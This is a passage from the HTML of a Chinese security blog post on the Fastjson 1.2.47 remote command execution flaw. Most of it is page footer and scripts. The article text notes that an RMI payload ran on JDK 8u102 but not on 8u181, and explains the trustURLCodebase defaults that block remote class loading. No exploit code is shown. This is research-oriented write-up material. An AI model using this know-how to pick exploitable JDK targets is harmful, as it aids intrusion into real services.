class=&#34;headerlink&#34; title=&#34;可以看到我们前面用的payload 发送方式，是RMI （Remote Method Invocation) 方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk:8u102 版本可以顺利的跑起来计算器，而 jdk:8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。&#34;&gt;&lt;/a&gt;可以看到我们前面用的payload 发送方式，是RMI （Remote Method Invocation) 方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk:8u102 版本可以顺利的跑起来计算器，而 jdk:8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。&lt;/h2&gt;&lt;p&gt;&lt;a href=&#34;https://www.buhuixiu.com/images/jdk102-%E5%85%A8%E5%9B%BE%E8%BF%90%E8%A1%8C.png&#34; class=&#34;gallery-item&#34;&gt;&lt;img src=&#34;https://www.buhuixiu.com/images/jdk102-%E5%85%A8%E5%9B%BE%E8%BF%90%E8%A1%8C.png&#34;&gt;&lt;/a&gt;&lt;/img&gt;&lt;/p&gt;
&lt;div&gt;


&lt;p&gt;&lt;a href=&#34;https://www.buhuixiu.com/images/jdk-8u-102.png&#34; class=&#34;gallery-item&#34;&gt;&lt;img src=&#34;https://www.buhuixiu.com/images/jdk-8u-102.png&#34; width=70% height=70%&gt;&lt;/a&gt;&lt;/img&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.buhuixiu.com/images/jdk181.png&#34; class=&#34;gallery-item&#34;&gt;&lt;img src=&#34;https://www.buhuixiu.com/images/jdk181.png&#34; width=70% height=70%&gt;&lt;/a&gt;&lt;/img&gt;&lt;/p&gt;
&lt;/div&gt;
通过参考一些帖子，相应的较新版本的jdk都有了针对RMI方式的防御，
系统属性 com.sun.jndi.rmi.object.trustURLCodebase、com.sun.jndi.cosnaming.object.trustURLCodebase 的默认值变为false，即默认不允许从远程的Codebase加载Reference工厂类。如果需要开启 RMI Registry 或者 COS Naming Service Provider的远程类加载功能，需要将前面说的两个属性值设置为true。"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&t=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-right">
    Copyright &copy;
    
    
    2016-2021
    Sampson.Z
<img src="https://www.buhuixiu.com/images/jgawb.png">
<a href="http://www.beian.miit.gov.cn/"  style="color:#f72b07" target="_blank">粤ICP备19066509号</a>

  
  
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/tags/">标签</a></li>
        
      </ul>
    </nav>
  



        <!-- 不蒜子统计 -->
        <span id="busuanzi_container_site_pv">
                本站总访问量<span id="busuanzi_value_site_pv"></span>次
        </span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv" style='display:none'>
                本站访客数<span id="busuanzi_value_site_uv"></span>人
        </span>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

</div>


</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
